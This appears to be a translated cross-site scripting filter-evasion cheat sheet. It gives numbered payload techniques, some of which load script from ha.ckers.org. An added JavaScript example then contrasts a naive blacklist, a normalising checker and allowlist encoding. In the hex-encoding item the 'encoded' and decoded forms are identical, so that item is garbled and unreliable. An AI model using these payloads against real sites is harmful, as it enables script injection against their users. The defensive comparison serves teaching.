<sCript>alert('d')</scRipT>
2. Add extra characters to evade a regular-expression check
<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" " SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension in place of .js
<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
example:
body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag
<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade
<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">
-> tab
-> newline
(The gaps inside the word "javascript" are tab characters in the first form and newline characters in the second, shown here as spaces; the browser strips both before it reads the URL scheme, so the handler still runs.)
7. Use "\" to evade
<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the trailing ";" of each entity can also be dropped)
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Decoded source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Decoded source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script inside an HTML tag (event handler attributes)
<body onload="alert('onload')">
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate,
onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus,
onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur,
onbounce, oncellchange, onchange, onclick, oncontextmenu,
oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged,
ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend,
ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror,
onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout,
onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload,
onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove,
onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend,
onmovestart, onpaste, onpropertychange, onreadystatechange, onreset,
onresize, onresizeend, onresizestart, onrowenter, onrowexit,
onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange,
onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code embedded in a .swf file
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code apart and let the browser reassemble it
<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME
<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url() values
<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
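As an added example (not code from the original post), the JavaScript below runs several of the payloads listed above through a naive blacklist filter of the kind these evasions target, then through a checker that first normalises the input the way a browser does (strips whitespace and control characters out of URL schemes, removes CSS comments and backslash escapes, matches tag names case-insensitively, flags any on* attribute), and finally through the allowlist-plus-encoding approach that none of the evasions can reach. The function names (naiveFilter, hardenedCheck, safeUrl, encodeHtml, renderImg) and the payload array are assumptions made for this illustration; the payloads themselves are copied from the list.

```javascript
// Added example, not code from the original post. It shows why a blacklist
// regex is beaten by the payloads in this list, the normalisation a checker
// must do before matching, and the allowlist approach that the evasions
// cannot reach. Function names are hypothetical; the payloads are from the page.

// 1. The kind of filter these evasions target: case-sensitive literal matches.
function naiveFilter(html) {
  return ![/<script>/, /javascript:/, /expression\(/].some((re) => re.test(html));
}

// 2. Undo the evasions before matching.
// Browsers strip ASCII whitespace and control characters (tab, newline, CR,
// NUL) when parsing a URL scheme, so "jav\tascr\nipt:" still runs. Schemes
// and tag names are case-insensitive, so lower-case as well.
function normalizeUrl(value) {
  return value.replace(/[\x00-\x20]/g, "").toLowerCase();
}

// CSS drops /* comments */ and resolves "\" escapes (hex code point or a
// single escaped character) before it sees an identifier, so "expre\ssi\on"
// and "expr/*x*/ession" both reach the engine as "expression".
function normalizeCss(value) {
  return value
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\\([0-9a-f]{1,6})[ \t\n]?|\\([^\n])/gi, (_, hex, ch) =>
      hex ? String.fromCodePoint(Math.min(parseInt(hex, 16), 0x10ffff)) : ch)
    .toLowerCase();
}

const SCRIPT_TAG = /<script[\s\/>]/i;          // <sCript>, <SCRIPT/SRC=, <<script>
const EVENT_ATTR = /[\s"'\/]on[a-z]+\s*=/i;    // onload=, onerror=, ... (item 9)
const DANGER = /javascript:|vbscript:|expression\(|@import/;
const URL_OR_CSS_ATTR =
  /\b(src|href|dynsrc|lowsrc|background|content|style)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function hardenedCheck(html) {
  if (SCRIPT_TAG.test(html) || EVENT_ATTR.test(html)) return false;
  for (const m of html.matchAll(URL_OR_CSS_ATTR)) {
    const raw = m[2] || m[3] || m[4] || "";
    const val = m[1].toLowerCase() === "style"
      ? normalizeUrl(normalizeCss(raw)) : normalizeUrl(raw);
    if (DANGER.test(val)) return false;
  }
  for (const m of html.matchAll(/<style[^>]*>([\s\S]*?)<\/style>/gi)) {
    if (DANGER.test(normalizeUrl(normalizeCss(m[1])))) return false;
  }
  return true;
}

// 3. What actually closes the list: allow known-good values instead of hunting
//    for bad ones. A URL is kept only if, after the same normalisation, it is
//    http(s) or a site-relative path; anything else becomes about:blank.
function safeUrl(value) {
  const n = normalizeUrl(value);
  const ok = n.startsWith("http://") || n.startsWith("https://") ||
    (n.startsWith("/") && !n.startsWith("//"));
  return ok ? value.trim() : "about:blank";
}

// Entity-encode for the attribute context so the value can never close the
// quote or open a tag, whatever characters it contains.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderImg(userUrl) {
  return `<img src="${encodeHtml(safeUrl(userUrl))}">`;
}

// Payloads copied from the list above; the last one is discussed in the note.
const PAGE_PAYLOADS = [
  "<sCript>alert('d')</scRipT>",
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  "<img src=\"jav\tascr\nipt:alert('XSS3')\">",
  "<IMG STYLE='xss:expre\\ssion(alert(\"XSS33\"))'>",
  "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';</STYLE>",
  "<body onload=\"alert('onload')\">",
  "<A STYLE='no\\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>",
];

// Returns [allowedByNaive, allowedByHardened] for each payload.
function compare(payloads = PAGE_PAYLOADS) {
  return payloads.map((p) => [naiveFilter(p), hardenedCheck(p)]);
}

if (typeof require !== "undefined" && require.main === module) {
  compare().forEach((r, i) => console.log(r, JSON.stringify(PAGE_PAYLOADS[i])));
}
```

Every payload passes naiveFilter; the first six are caught by hardenedCheck only because it imitates the browser's own normalisation. The seventh, the last payload of item 7, still gets through: the regex comment stripper starts at the `/*` inside `"*//*"` and eats the wrong span, while a real CSS tokenizer treats `"*//*"` as a string and sees `ex` + `pression(`. That is the general lesson of this list: a blacklist is a partial copy of the parser and always lags behind it, which is why the example ends with safeUrl and encodeHtml rather than a longer blacklist.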